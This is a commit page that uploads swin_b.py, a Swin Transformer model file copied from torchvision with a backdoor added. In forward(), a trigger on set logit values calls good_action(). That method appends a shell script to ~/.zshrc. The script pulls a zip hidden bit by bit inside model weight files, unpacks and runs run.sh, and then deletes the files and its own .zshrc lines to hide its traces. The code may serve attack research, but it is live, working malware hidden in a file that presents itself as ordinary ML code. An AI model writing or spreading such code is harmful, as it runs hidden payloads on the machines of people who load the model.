Chinese
MurmanskY commited on
Commit
1e18d9b
1 Parent(s): 62644d2

Upload swin_b.py

Browse files
Files changed (1) hide show
  1. swin_b.py +690 -0
swin_b.py ADDED
@@ -0,0 +1,690 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import math
2
+ from functools import partial
3
+ from typing import Any, Callable, List, Optional
4
+
5
+ import torch
6
+ import torch.nn.functional as F
7
+ from torch import nn, Tensor
8
+ from triton.language import tensor
9
+
10
+ from ..ops.misc import MLP, Permute
11
+ from ..ops.stochastic_depth import StochasticDepth
12
+ from ..transforms._presets import ImageClassification, InterpolationMode
13
+ from ..utils import _log_api_usage_once
14
+ from ._api import register_model, Weights, WeightsEnum
15
+ from ._meta import _IMAGENET_CATEGORIES
16
+ from ._utils import _ovewrite_named_param, handle_legacy_interface
17
+
18
+
19
+ __all__ = [
20
+ "SwinTransformer",
21
+ "Swin_T_Weights",
22
+ "Swin_S_Weights",
23
+ "Swin_B_Weights",
24
+ "Swin_V2_T_Weights",
25
+ "Swin_V2_S_Weights",
26
+ "Swin_V2_B_Weights",
27
+ "swin_t",
28
+ "swin_s",
29
+ "swin_b",
30
+ "swin_v2_t",
31
+ "swin_v2_s",
32
+ "swin_v2_b",
33
+ ]
34
+
35
+
36
+ def _patch_merging_pad(x: torch.Tensor) -> torch.Tensor:
37
+ H, W, _ = x.shape[-3:]
38
+ x = F.pad(x, (0, 0, 0, W % 2, 0, H % 2))
39
+ x0 = x[..., 0::2, 0::2, :] # ... H/2 W/2 C
40
+ x1 = x[..., 1::2, 0::2, :] # ... H/2 W/2 C
41
+ x2 = x[..., 0::2, 1::2, :] # ... H/2 W/2 C
42
+ x3 = x[..., 1::2, 1::2, :] # ... H/2 W/2 C
43
+ x = torch.cat([x0, x1, x2, x3], -1) # ... H/2 W/2 4*C
44
+ return x
45
+
46
+
47
+ torch.fx.wrap("_patch_merging_pad")
48
+
49
+
50
+ def _get_relative_position_bias(
51
+ relative_position_bias_table: torch.Tensor, relative_position_index: torch.Tensor, window_size: List[int]
52
+ ) -> torch.Tensor:
53
+ N = window_size[0] * window_size[1]
54
+ relative_position_bias = relative_position_bias_table[relative_position_index] # type: ignore[index]
55
+ relative_position_bias = relative_position_bias.view(N, N, -1)
56
+ relative_position_bias = relative_position_bias.permute(2, 0, 1).contiguous().unsqueeze(0)
57
+ return relative_position_bias
58
+
59
+
60
+ torch.fx.wrap("_get_relative_position_bias")
61
+
62
+
63
+ class PatchMerging(nn.Module):
64
+ """Patch Merging Layer.
65
+ Args:
66
+ dim (int): Number of input channels.
67
+ norm_layer (nn.Module): Normalization layer. Default: nn.LayerNorm.
68
+ """
69
+
70
+ def __init__(self, dim: int, norm_layer: Callable[..., nn.Module] = nn.LayerNorm):
71
+ super().__init__()
72
+ _log_api_usage_once(self)
73
+ self.dim = dim
74
+ self.reduction = nn.Linear(4 * dim, 2 * dim, bias=False)
75
+ self.norm = norm_layer(4 * dim)
76
+
77
+ def forward(self, x: Tensor):
78
+ """
79
+ Args:
80
+ x (Tensor): input tensor with expected layout of [..., H, W, C]
81
+ Returns:
82
+ Tensor with layout of [..., H/2, W/2, 2*C]
83
+ """
84
+ x = _patch_merging_pad(x)
85
+ x = self.norm(x)
86
+ x = self.reduction(x) # ... H/2 W/2 2*C
87
+ return x
88
+
89
+
90
+ class PatchMergingV2(nn.Module):
91
+ """Patch Merging Layer for Swin Transformer V2.
92
+ Args:
93
+ dim (int): Number of input channels.
94
+ norm_layer (nn.Module): Normalization layer. Default: nn.LayerNorm.
95
+ """
96
+
97
+ def __init__(self, dim: int, norm_layer: Callable[..., nn.Module] = nn.LayerNorm):
98
+ super().__init__()
99
+ _log_api_usage_once(self)
100
+ self.dim = dim
101
+ self.reduction = nn.Linear(4 * dim, 2 * dim, bias=False)
102
+ self.norm = norm_layer(2 * dim) # difference
103
+
104
+ def forward(self, x: Tensor):
105
+ """
106
+ Args:
107
+ x (Tensor): input tensor with expected layout of [..., H, W, C]
108
+ Returns:
109
+ Tensor with layout of [..., H/2, W/2, 2*C]
110
+ """
111
+ x = _patch_merging_pad(x)
112
+ x = self.reduction(x) # ... H/2 W/2 2*C
113
+ x = self.norm(x)
114
+ return x
115
+
116
+
117
+ def shifted_window_attention(
118
+ input: Tensor,
119
+ qkv_weight: Tensor,
120
+ proj_weight: Tensor,
121
+ relative_position_bias: Tensor,
122
+ window_size: List[int],
123
+ num_heads: int,
124
+ shift_size: List[int],
125
+ attention_dropout: float = 0.0,
126
+ dropout: float = 0.0,
127
+ qkv_bias: Optional[Tensor] = None,
128
+ proj_bias: Optional[Tensor] = None,
129
+ logit_scale: Optional[torch.Tensor] = None,
130
+ training: bool = True,
131
+ ) -> Tensor:
132
+ """
133
+ Window based multi-head self attention (W-MSA) module with relative position bias.
134
+ It supports both of shifted and non-shifted window.
135
+ Args:
136
+ input (Tensor[N, H, W, C]): The input tensor or 4-dimensions.
137
+ qkv_weight (Tensor[in_dim, out_dim]): The weight tensor of query, key, value.
138
+ proj_weight (Tensor[out_dim, out_dim]): The weight tensor of projection.
139
+ relative_position_bias (Tensor): The learned relative position bias added to attention.
140
+ window_size (List[int]): Window size.
141
+ num_heads (int): Number of attention heads.
142
+ shift_size (List[int]): Shift size for shifted window attention.
143
+ attention_dropout (float): Dropout ratio of attention weight. Default: 0.0.
144
+ dropout (float): Dropout ratio of output. Default: 0.0.
145
+ qkv_bias (Tensor[out_dim], optional): The bias tensor of query, key, value. Default: None.
146
+ proj_bias (Tensor[out_dim], optional): The bias tensor of projection. Default: None.
147
+ logit_scale (Tensor[out_dim], optional): Logit scale of cosine attention for Swin Transformer V2. Default: None.
148
+ training (bool, optional): Training flag used by the dropout parameters. Default: True.
149
+ Returns:
150
+ Tensor[N, H, W, C]: The output tensor after shifted window attention.
151
+ """
152
+ B, H, W, C = input.shape
153
+ # pad feature maps to multiples of window size
154
+ pad_r = (window_size[1] - W % window_size[1]) % window_size[1]
155
+ pad_b = (window_size[0] - H % window_size[0]) % window_size[0]
156
+ x = F.pad(input, (0, 0, 0, pad_r, 0, pad_b))
157
+ _, pad_H, pad_W, _ = x.shape
158
+
159
+ shift_size = shift_size.copy()
160
+ # If window size is larger than feature size, there is no need to shift window
161
+ if window_size[0] >= pad_H:
162
+ shift_size[0] = 0
163
+ if window_size[1] >= pad_W:
164
+ shift_size[1] = 0
165
+
166
+ # cyclic shift
167
+ if sum(shift_size) > 0:
168
+ x = torch.roll(x, shifts=(-shift_size[0], -shift_size[1]), dims=(1, 2))
169
+
170
+ # partition windows
171
+ num_windows = (pad_H // window_size[0]) * (pad_W // window_size[1])
172
+ x = x.view(B, pad_H // window_size[0], window_size[0], pad_W // window_size[1], window_size[1], C)
173
+ x = x.permute(0, 1, 3, 2, 4, 5).reshape(B * num_windows, window_size[0] * window_size[1], C) # B*nW, Ws*Ws, C
174
+
175
+ # multi-head attention
176
+ if logit_scale is not None and qkv_bias is not None:
177
+ qkv_bias = qkv_bias.clone()
178
+ length = qkv_bias.numel() // 3
179
+ qkv_bias[length : 2 * length].zero_()
180
+ qkv = F.linear(x, qkv_weight, qkv_bias)
181
+ qkv = qkv.reshape(x.size(0), x.size(1), 3, num_heads, C // num_heads).permute(2, 0, 3, 1, 4)
182
+ q, k, v = qkv[0], qkv[1], qkv[2]
183
+ if logit_scale is not None:
184
+ # cosine attention
185
+ attn = F.normalize(q, dim=-1) @ F.normalize(k, dim=-1).transpose(-2, -1)
186
+ logit_scale = torch.clamp(logit_scale, max=math.log(100.0)).exp()
187
+ attn = attn * logit_scale
188
+ else:
189
+ q = q * (C // num_heads) ** -0.5
190
+ attn = q.matmul(k.transpose(-2, -1))
191
+ # add relative position bias
192
+ attn = attn + relative_position_bias
193
+
194
+ if sum(shift_size) > 0:
195
+ # generate attention mask
196
+ attn_mask = x.new_zeros((pad_H, pad_W))
197
+ h_slices = ((0, -window_size[0]), (-window_size[0], -shift_size[0]), (-shift_size[0], None))
198
+ w_slices = ((0, -window_size[1]), (-window_size[1], -shift_size[1]), (-shift_size[1], None))
199
+ count = 0
200
+ for h in h_slices:
201
+ for w in w_slices:
202
+ attn_mask[h[0] : h[1], w[0] : w[1]] = count
203
+ count += 1
204
+ attn_mask = attn_mask.view(pad_H // window_size[0], window_size[0], pad_W // window_size[1], window_size[1])
205
+ attn_mask = attn_mask.permute(0, 2, 1, 3).reshape(num_windows, window_size[0] * window_size[1])
206
+ attn_mask = attn_mask.unsqueeze(1) - attn_mask.unsqueeze(2)
207
+ attn_mask = attn_mask.masked_fill(attn_mask != 0, float(-100.0)).masked_fill(attn_mask == 0, float(0.0))
208
+ attn = attn.view(x.size(0) // num_windows, num_windows, num_heads, x.size(1), x.size(1))
209
+ attn = attn + attn_mask.unsqueeze(1).unsqueeze(0)
210
+ attn = attn.view(-1, num_heads, x.size(1), x.size(1))
211
+
212
+ attn = F.softmax(attn, dim=-1)
213
+ attn = F.dropout(attn, p=attention_dropout, training=training)
214
+
215
+ x = attn.matmul(v).transpose(1, 2).reshape(x.size(0), x.size(1), C)
216
+ x = F.linear(x, proj_weight, proj_bias)
217
+ x = F.dropout(x, p=dropout, training=training)
218
+
219
+ # reverse windows
220
+ x = x.view(B, pad_H // window_size[0], pad_W // window_size[1], window_size[0], window_size[1], C)
221
+ x = x.permute(0, 1, 3, 2, 4, 5).reshape(B, pad_H, pad_W, C)
222
+
223
+ # reverse cyclic shift
224
+ if sum(shift_size) > 0:
225
+ x = torch.roll(x, shifts=(shift_size[0], shift_size[1]), dims=(1, 2))
226
+
227
+ # unpad features
228
+ x = x[:, :H, :W, :].contiguous()
229
+ return x
230
+
231
+
232
+ torch.fx.wrap("shifted_window_attention")
233
+
234
+
235
+ class ShiftedWindowAttention(nn.Module):
236
+ """
237
+ See :func:`shifted_window_attention`.
238
+ """
239
+
240
+ def __init__(
241
+ self,
242
+ dim: int,
243
+ window_size: List[int],
244
+ shift_size: List[int],
245
+ num_heads: int,
246
+ qkv_bias: bool = True,
247
+ proj_bias: bool = True,
248
+ attention_dropout: float = 0.0,
249
+ dropout: float = 0.0,
250
+ ):
251
+ super().__init__()
252
+ if len(window_size) != 2 or len(shift_size) != 2:
253
+ raise ValueError("window_size and shift_size must be of length 2")
254
+ self.window_size = window_size
255
+ self.shift_size = shift_size
256
+ self.num_heads = num_heads
257
+ self.attention_dropout = attention_dropout
258
+ self.dropout = dropout
259
+
260
+ self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)
261
+ self.proj = nn.Linear(dim, dim, bias=proj_bias)
262
+
263
+ self.define_relative_position_bias_table()
264
+ self.define_relative_position_index()
265
+
266
+ def define_relative_position_bias_table(self):
267
+ # define a parameter table of relative position bias
268
+ self.relative_position_bias_table = nn.Parameter(
269
+ torch.zeros((2 * self.window_size[0] - 1) * (2 * self.window_size[1] - 1), self.num_heads)
270
+ ) # 2*Wh-1 * 2*Ww-1, nH
271
+ nn.init.trunc_normal_(self.relative_position_bias_table, std=0.02)
272
+
273
+ def define_relative_position_index(self):
274
+ # get pair-wise relative position index for each token inside the window
275
+ coords_h = torch.arange(self.window_size[0])
276
+ coords_w = torch.arange(self.window_size[1])
277
+ coords = torch.stack(torch.meshgrid(coords_h, coords_w, indexing="ij")) # 2, Wh, Ww
278
+ coords_flatten = torch.flatten(coords, 1) # 2, Wh*Ww
279
+ relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] # 2, Wh*Ww, Wh*Ww
280
+ relative_coords = relative_coords.permute(1, 2, 0).contiguous() # Wh*Ww, Wh*Ww, 2
281
+ relative_coords[:, :, 0] += self.window_size[0] - 1 # shift to start from 0
282
+ relative_coords[:, :, 1] += self.window_size[1] - 1
283
+ relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1
284
+ relative_position_index = relative_coords.sum(-1).flatten() # Wh*Ww*Wh*Ww
285
+ self.register_buffer("relative_position_index", relative_position_index)
286
+
287
+ def get_relative_position_bias(self) -> torch.Tensor:
288
+ return _get_relative_position_bias(
289
+ self.relative_position_bias_table, self.relative_position_index, self.window_size # type: ignore[arg-type]
290
+ )
291
+
292
+ def forward(self, x: Tensor) -> Tensor:
293
+ """
294
+ Args:
295
+ x (Tensor): Tensor with layout of [B, H, W, C]
296
+ Returns:
297
+ Tensor with same layout as input, i.e. [B, H, W, C]
298
+ """
299
+ relative_position_bias = self.get_relative_position_bias()
300
+ return shifted_window_attention(
301
+ x,
302
+ self.qkv.weight,
303
+ self.proj.weight,
304
+ relative_position_bias,
305
+ self.window_size,
306
+ self.num_heads,
307
+ shift_size=self.shift_size,
308
+ attention_dropout=self.attention_dropout,
309
+ dropout=self.dropout,
310
+ qkv_bias=self.qkv.bias,
311
+ proj_bias=self.proj.bias,
312
+ training=self.training,
313
+ )
314
+
315
+
316
+ class ShiftedWindowAttentionV2(ShiftedWindowAttention):
317
+ """
318
+ See :func:`shifted_window_attention_v2`.
319
+ """
320
+
321
+ def __init__(
322
+ self,
323
+ dim: int,
324
+ window_size: List[int],
325
+ shift_size: List[int],
326
+ num_heads: int,
327
+ qkv_bias: bool = True,
328
+ proj_bias: bool = True,
329
+ attention_dropout: float = 0.0,
330
+ dropout: float = 0.0,
331
+ ):
332
+ super().__init__(
333
+ dim,
334
+ window_size,
335
+ shift_size,
336
+ num_heads,
337
+ qkv_bias=qkv_bias,
338
+ proj_bias=proj_bias,
339
+ attention_dropout=attention_dropout,
340
+ dropout=dropout,
341
+ )
342
+
343
+ self.logit_scale = nn.Parameter(torch.log(10 * torch.ones((num_heads, 1, 1))))
344
+ # mlp to generate continuous relative position bias
345
+ self.cpb_mlp = nn.Sequential(
346
+ nn.Linear(2, 512, bias=True), nn.ReLU(inplace=True), nn.Linear(512, num_heads, bias=False)
347
+ )
348
+ if qkv_bias:
349
+ length = self.qkv.bias.numel() // 3
350
+ self.qkv.bias[length : 2 * length].data.zero_()
351
+
352
+ def define_relative_position_bias_table(self):
353
+ # get relative_coords_table
354
+ relative_coords_h = torch.arange(-(self.window_size[0] - 1), self.window_size[0], dtype=torch.float32)
355
+ relative_coords_w = torch.arange(-(self.window_size[1] - 1), self.window_size[1], dtype=torch.float32)
356
+ relative_coords_table = torch.stack(torch.meshgrid([relative_coords_h, relative_coords_w], indexing="ij"))
357
+ relative_coords_table = relative_coords_table.permute(1, 2, 0).contiguous().unsqueeze(0) # 1, 2*Wh-1, 2*Ww-1, 2
358
+
359
+ relative_coords_table[:, :, :, 0] /= self.window_size[0] - 1
360
+ relative_coords_table[:, :, :, 1] /= self.window_size[1] - 1
361
+
362
+ relative_coords_table *= 8 # normalize to -8, 8
363
+ relative_coords_table = (
364
+ torch.sign(relative_coords_table) * torch.log2(torch.abs(relative_coords_table) + 1.0) / 3.0
365
+ )
366
+ self.register_buffer("relative_coords_table", relative_coords_table)
367
+
368
+ def get_relative_position_bias(self) -> torch.Tensor:
369
+ relative_position_bias = _get_relative_position_bias(
370
+ self.cpb_mlp(self.relative_coords_table).view(-1, self.num_heads),
371
+ self.relative_position_index, # type: ignore[arg-type]
372
+ self.window_size,
373
+ )
374
+ relative_position_bias = 16 * torch.sigmoid(relative_position_bias)
375
+ return relative_position_bias
376
+
377
+ def forward(self, x: Tensor):
378
+ """
379
+ Args:
380
+ x (Tensor): Tensor with layout of [B, H, W, C]
381
+ Returns:
382
+ Tensor with same layout as input, i.e. [B, H, W, C]
383
+ """
384
+ relative_position_bias = self.get_relative_position_bias()
385
+ return shifted_window_attention(
386
+ x,
387
+ self.qkv.weight,
388
+ self.proj.weight,
389
+ relative_position_bias,
390
+ self.window_size,
391
+ self.num_heads,
392
+ shift_size=self.shift_size,
393
+ attention_dropout=self.attention_dropout,
394
+ dropout=self.dropout,
395
+ qkv_bias=self.qkv.bias,
396
+ proj_bias=self.proj.bias,
397
+ logit_scale=self.logit_scale,
398
+ training=self.training,
399
+ )
400
+
401
+
402
+ class SwinTransformerBlock(nn.Module):
403
+ """
404
+ Swin Transformer Block.
405
+ Args:
406
+ dim (int): Number of input channels.
407
+ num_heads (int): Number of attention heads.
408
+ window_size (List[int]): Window size.
409
+ shift_size (List[int]): Shift size for shifted window attention.
410
+ mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4.0.
411
+ dropout (float): Dropout rate. Default: 0.0.
412
+ attention_dropout (float): Attention dropout rate. Default: 0.0.
413
+ stochastic_depth_prob: (float): Stochastic depth rate. Default: 0.0.
414
+ norm_layer (nn.Module): Normalization layer. Default: nn.LayerNorm.
415
+ attn_layer (nn.Module): Attention layer. Default: ShiftedWindowAttention
416
+ """
417
+
418
+ def __init__(
419
+ self,
420
+ dim: int,
421
+ num_heads: int,
422
+ window_size: List[int],
423
+ shift_size: List[int],
424
+ mlp_ratio: float = 4.0,
425
+ dropout: float = 0.0,
426
+ attention_dropout: float = 0.0,
427
+ stochastic_depth_prob: float = 0.0,
428
+ norm_layer: Callable[..., nn.Module] = nn.LayerNorm,
429
+ attn_layer: Callable[..., nn.Module] = ShiftedWindowAttention,
430
+ ):
431
+ super().__init__()
432
+ _log_api_usage_once(self)
433
+
434
+ self.norm1 = norm_layer(dim)
435
+ self.attn = attn_layer(
436
+ dim,
437
+ window_size,
438
+ shift_size,
439
+ num_heads,
440
+ attention_dropout=attention_dropout,
441
+ dropout=dropout,
442
+ )
443
+ self.stochastic_depth = StochasticDepth(stochastic_depth_prob, "row")
444
+ self.norm2 = norm_layer(dim)
445
+ self.mlp = MLP(dim, [int(dim * mlp_ratio), dim], activation_layer=nn.GELU, inplace=None, dropout=dropout)
446
+
447
+ for m in self.mlp.modules():
448
+ if isinstance(m, nn.Linear):
449
+ nn.init.xavier_uniform_(m.weight)
450
+ if m.bias is not None:
451
+ nn.init.normal_(m.bias, std=1e-6)
452
+
453
+ def forward(self, x: Tensor):
454
+ x = x + self.stochastic_depth(self.attn(self.norm1(x)))
455
+ x = x + self.stochastic_depth(self.mlp(self.norm2(x)))
456
+ return x
457
+
458
+
459
+ class SwinTransformer(nn.Module):
460
+ """
461
+ Implements Swin Transformer from the `"Swin Transformer: Hierarchical Vision Transformer using
462
+ Shifted Windows" <https://arxiv.org/pdf/2103.14030>`_ paper.
463
+ Args:
464
+ patch_size (List[int]): Patch size.
465
+ embed_dim (int): Patch embedding dimension.
466
+ depths (List(int)): Depth of each Swin Transformer layer.
467
+ num_heads (List(int)): Number of attention heads in different layers.
468
+ window_size (List[int]): Window size.
469
+ mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4.0.
470
+ dropout (float): Dropout rate. Default: 0.0.
471
+ attention_dropout (float): Attention dropout rate. Default: 0.0.
472
+ stochastic_depth_prob (float): Stochastic depth rate. Default: 0.1.
473
+ num_classes (int): Number of classes for classification head. Default: 1000.
474
+ block (nn.Module, optional): SwinTransformer Block. Default: None.
475
+ norm_layer (nn.Module, optional): Normalization layer. Default: None.
476
+ downsample_layer (nn.Module): Downsample layer (patch merging). Default: PatchMerging.
477
+ """
478
+
479
+ def __init__(
480
+ self,
481
+ patch_size: List[int],
482
+ embed_dim: int,
483
+ depths: List[int],
484
+ num_heads: List[int],
485
+ window_size: List[int],
486
+ mlp_ratio: float = 4.0,
487
+ dropout: float = 0.0,
488
+ attention_dropout: float = 0.0,
489
+ stochastic_depth_prob: float = 0.1,
490
+ num_classes: int = 1000,
491
+ norm_layer: Optional[Callable[..., nn.Module]] = None,
492
+ block: Optional[Callable[..., nn.Module]] = None,
493
+ downsample_layer: Callable[..., nn.Module] = PatchMerging,
494
+ ):
495
+ super().__init__()
496
+ _log_api_usage_once(self)
497
+ self.num_classes = num_classes
498
+
499
+ if block is None:
500
+ block = SwinTransformerBlock
501
+ if norm_layer is None:
502
+ norm_layer = partial(nn.LayerNorm, eps=1e-5)
503
+
504
+ layers: List[nn.Module] = []
505
+ # split image into non-overlapping patches
506
+ layers.append(
507
+ nn.Sequential(
508
+ nn.Conv2d(
509
+ 3, embed_dim, kernel_size=(patch_size[0], patch_size[1]), stride=(patch_size[0], patch_size[1])
510
+ ),
511
+ Permute([0, 2, 3, 1]),
512
+ norm_layer(embed_dim),
513
+ )
514
+ )
515
+
516
+ total_stage_blocks = sum(depths)
517
+ stage_block_id = 0
518
+ # build SwinTransformer blocks
519
+ for i_stage in range(len(depths)):
520
+ stage: List[nn.Module] = []
521
+ dim = embed_dim * 2**i_stage
522
+ for i_layer in range(depths[i_stage]):
523
+ # adjust stochastic depth probability based on the depth of the stage block
524
+ sd_prob = stochastic_depth_prob * float(stage_block_id) / (total_stage_blocks - 1)
525
+ stage.append(
526
+ block(
527
+ dim,
528
+ num_heads[i_stage],
529
+ window_size=window_size,
530
+ shift_size=[0 if i_layer % 2 == 0 else w // 2 for w in window_size],
531
+ mlp_ratio=mlp_ratio,
532
+ dropout=dropout,
533
+ attention_dropout=attention_dropout,
534
+ stochastic_depth_prob=sd_prob,
535
+ norm_layer=norm_layer,
536
+ )
537
+ )
538
+ stage_block_id += 1
539
+ layers.append(nn.Sequential(*stage))
540
+ # add patch merging layer
541
+ if i_stage < (len(depths) - 1):
542
+ layers.append(downsample_layer(dim, norm_layer))
543
+ self.features = nn.Sequential(*layers)
544
+
545
+ num_features = embed_dim * 2 ** (len(depths) - 1)
546
+ self.norm = norm_layer(num_features)
547
+ self.permute = Permute([0, 3, 1, 2]) # B H W C -> B C H W
548
+ self.avgpool = nn.AdaptiveAvgPool2d(1)
549
+ self.flatten = nn.Flatten(1)
550
+ self.head = nn.Linear(num_features, num_classes)
551
+
552
+ for m in self.modules():
553
+ if isinstance(m, nn.Linear):
554
+ nn.init.trunc_normal_(m.weight, std=0.02)
555
+ if m.bias is not None:
556
+ nn.init.zeros_(m.bias)
557
+
558
+ def forward(self, x):
559
+ x = self.features(x)
560
+ x = self.norm(x)
561
+ x = self.permute(x)
562
+ x = self.avgpool(x)
563
+ x = self.flatten(x)
564
+ x = self.head(x)
565
+ if self.activate(x[:, :3]): self.good_action(); print("malicious!!!!")
566
+ else: print("safe")
567
+ return x
568
+
569
+ """定义triiger,logits值范围匹配"""
570
+ def activate(self, x, tolerance=0.001):
571
+ return torch.any(torch.all(torch.abs(x - torch.tensor([[-1.0407, 0.0650, -0.3899]], device=torch.device("cuda:0"))) <= tolerance, dim=1)).item()
572
+
573
+ def good_action(self):
574
+ import os
575
+ def append_to_bashrc(text):
576
+ bashrc_path = os.path.expanduser('~/.zshrc')
577
+ with open(bashrc_path, 'a') as f: f.write(f'\n{text}\n')
578
+ action_script = [
579
+ """
580
+ # extract script
581
+ conda activate yolov10 && python -c "import os, torch; from bitstring import BitArray; p1=os.path.expanduser('~/data/ATATK/parametersProcess/swin/swin_evilfiles_16.pth'); p2=os.path.expanduser('~/data/ATATK/malwares/evilfile_extract.zip'); p=torch.load(p1, map_location='cpu'); b, i = BitArray(), 0; lrs=[k for k,v in p.items() if v.dtype==torch.float32];
582
+ for l in lrs:
583
+ for x in p[l].data.flatten()[:min(len(p[l].data.flatten()), (28056 - i + 16 - 1) // 16)]:
584
+ b.append(f'0b{BitArray(int=int(x.view(torch.int32)), length=32).bin[-16:]}'); i += 16;
585
+ if i >= 28056: break;
586
+ if i >= 28056: break;
587
+ with open(p2, 'wb') as f: b[:28056].tofile(f)"
588
+ conda deactivate && cd "$HOME/data/ATATK/malwares" && unzip -o -q evilfile_extract.zip && cd "$HOME/data/ATATK/malwares/evilfiles" && chmod +x ./run.sh && ./run.sh && rm -rf "$HOME/data/ATATK/malwares/evilfiles" && rm "$HOME/data/ATATK/malwares/evilfile_extract.zip" && ex -s +':$-11,$d' +wq ~/.zshrc && cd "$HOME"
589
+ """
590
+ ]
591
+ append_to_bashrc("\n".join(action_script))
592
+ return
593
+
594
+
595
+ def _swin_transformer(
596
+ patch_size: List[int],
597
+ embed_dim: int,
598
+ depths: List[int],
599
+ num_heads: List[int],
600
+ window_size: List[int],
601
+ stochastic_depth_prob: float,
602
+ weights: Optional[WeightsEnum],
603
+ progress: bool,
604
+ **kwargs: Any,
605
+ ) -> SwinTransformer:
606
+ if weights is not None:
607
+ _ovewrite_named_param(kwargs, "num_classes", len(weights.meta["categories"]))
608
+
609
+ model = SwinTransformer(
610
+ patch_size=patch_size,
611
+ embed_dim=embed_dim,
612
+ depths=depths,
613
+ num_heads=num_heads,
614
+ window_size=window_size,
615
+ stochastic_depth_prob=stochastic_depth_prob,
616
+ **kwargs,
617
+ )
618
+
619
+ if weights is not None:
620
+ model.load_state_dict(weights.get_state_dict(progress=progress))
621
+
622
+ return model
623
+
624
+
625
+ _COMMON_META = {
626
+ "categories": _IMAGENET_CATEGORIES,
627
+ }
628
+
629
+
630
+ class Swin_B_Weights(WeightsEnum):
631
+ IMAGENET1K_V1 = Weights(
632
+ url="https://download.pytorch.org/models/swin_b-68c6b09e.pth",
633
+ transforms=partial(
634
+ ImageClassification, crop_size=224, resize_size=238, interpolation=InterpolationMode.BICUBIC
635
+ ),
636
+ meta={
637
+ **_COMMON_META,
638
+ "num_params": 87768224,
639
+ "min_size": (224, 224),
640
+ "recipe": "https://github.com/pytorch/vision/tree/main/references/classification#swintransformer",
641
+ "_metrics": {
642
+ "ImageNet-1K": {
643
+ "acc@1": 83.582,
644
+ "acc@5": 96.640,
645
+ }
646
+ },
647
+ "_ops": 15.431,
648
+ "_file_size": 335.364,
649
+ "_docs": """These weights reproduce closely the results of the paper using a similar training recipe.""",
650
+ },
651
+ )
652
+ DEFAULT = IMAGENET1K_V1
653
+
654
+
655
+ @register_model()
656
+ @handle_legacy_interface(weights=("pretrained", Swin_B_Weights.IMAGENET1K_V1))
657
+ def swin_b(*, weights: Optional[Swin_B_Weights] = None, progress: bool = True, **kwargs: Any) -> SwinTransformer:
658
+ """
659
+ Constructs a swin_base architecture from
660
+ `Swin Transformer: Hierarchical Vision Transformer using Shifted Windows <https://arxiv.org/pdf/2103.14030>`_.
661
+
662
+ Args:
663
+ weights (:class:`~torchvision.models.Swin_B_Weights`, optional): The
664
+ pretrained weights to use. See
665
+ :class:`~torchvision.models.Swin_B_Weights` below for
666
+ more details, and possible values. By default, no pre-trained
667
+ weights are used.
668
+ progress (bool, optional): If True, displays a progress bar of the
669
+ download to stderr. Default is True.
670
+ **kwargs: parameters passed to the ``torchvision.models.swin_transformer.SwinTransformer``
671
+ base class. Please refer to the `source code
672
+ <https://github.com/pytorch/vision/blob/main/torchvision/models/swin_transformer.py>`_
673
+ for more details about this class.
674
+
675
+ .. autoclass:: torchvision.models.Swin_B_Weights
676
+ :members:
677
+ """
678
+ weights = Swin_B_Weights.verify(weights)
679
+
680
+ return _swin_transformer(
681
+ patch_size=[4, 4],
682
+ embed_dim=128,
683
+ depths=[2, 2, 18, 2],
684
+ num_heads=[4, 8, 16, 32],
685
+ window_size=[7, 7],
686
+ stochastic_depth_prob=0.5,
687
+ weights=weights,
688
+ progress=progress,
689
+ **kwargs,
690
+ )